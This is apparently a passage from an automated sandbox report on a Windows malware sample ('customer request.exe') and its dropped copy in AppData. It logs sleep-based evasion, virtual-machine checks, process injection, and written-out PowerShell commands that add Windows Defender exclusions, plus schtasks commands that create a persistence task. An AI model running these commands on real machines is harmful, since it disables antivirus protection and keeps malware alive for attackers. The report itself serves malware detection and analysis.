Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -596093s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -595984s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -595874s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -595752s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -595126s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -595000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -594890s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -594781s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -594671s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -594562s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -594452s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -594343s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -594234s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -594125s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -594015s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -593901s >= -30000s
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612	Thread sleep time: -593780s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599545	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599320	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598886	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598779	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598655	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598222	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597451	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595915	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595702	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595583	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595458	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599780
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599123
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598887
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598778
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598446
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598334
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 598077
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597749
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597202
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 597091
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596968
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596859
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596749
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596640
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596531
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596421
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596312
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 596093
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595874
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595752
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595126
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 595000
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594452
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594343
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594234
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594125
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 594015
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 593901
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Thread delayed: delay time: 593780

Source: tjvxuavKFXO.exe, 0000000A.00000002.1758134166.0000000001596000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: customer request.exe, 00000000.00000002.1720699808.0000000002EE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VmcIEFQxvUwHVg8HytX
Source: customer request.exe, 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd50e17492f410<
Source: tjvxuavKFXO.exe, 0000000A.00000002.1758134166.0000000001596000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd5109f061e5ee<
Source: customer request.exe, 00000008.00000002.4134374947.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4134788660.0000000000F96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\customer request.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\customer request.exe

Code function: 8_2_056F7B70 LdrInitializeThunk,

8_2_056F7B70

Source: C:\Users\user\Desktop\customer request.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\customer request.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\customer request.exe

Memory written: C:\Users\user\Desktop\customer request.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Users\user\Desktop\customer request.exe "C:\Users\user\Desktop\customer request.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp"
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"

Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Users\user\Desktop\customer request.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
